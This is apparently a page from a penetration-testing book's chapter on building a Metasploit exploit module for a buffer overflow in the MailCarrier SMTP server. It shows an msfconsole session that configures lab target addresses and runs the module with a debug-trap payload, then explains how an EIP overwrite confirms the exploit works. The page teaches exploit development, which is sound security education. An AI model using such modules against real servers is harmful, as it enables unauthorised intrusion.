background image

220

Chapter 15

In this case, we’ve selected an interrupt (breakpoint) at   so that execution 

will pause when it reaches our shellcode without us having to set a breakpoint.

Having configured the exploit section, we save the file as 

mailcarrier_book.rb

 

at 

modules/exploits/windows/smtp/

.

Testing Our Base Exploit

In the next step, we load the module in 

msfconsole

, set the required options, 

and configure a payload of 

generic/debug_trap

 (a great payload for exploit 

development that triggers a stop point when you are tracing the application 
in a debugger). Then we run the module:

msf > 

use exploit/windows/smtp/mailcarrier_book

msf exploit(mailcarrier_book) > 

show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local address
   RHOST                   yes       The target address
   RPORT  25               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 - EN

msf exploit(mailcarrier_book) > 

set LHOST 192.168.1.101

LHOST => 192.168.1.101
msf exploit(mailcarrier_book) > 

set RHOST 192.168.1.155

RHOST => 192.168.1.155

 

msf exploit(mailcarrier_book) 

set payload generic/debug_trap

payload => generic/debug_trap
msf exploit(mailcarrier_book) > 

exploit

[*] Exploit completed, but no session was created.
msf exploit(mailcarrier_book) >

We set the options as if we were running a normal exploit, except that we 

use the 

generic/debug_trap

 payload   to test our exploit.

After the module runs, the debugger should pause with EIP overwritten 

by 

42424242

 as shown in Figure 15-1; if you see a successful EIP overwrite 

of

42424242

, you know your exploit is working. Notice in Figure 15-1 that the 

EIP register points to 42424242 and that the NOP slide and the dummy pay-
load have made it into the buffer as expected.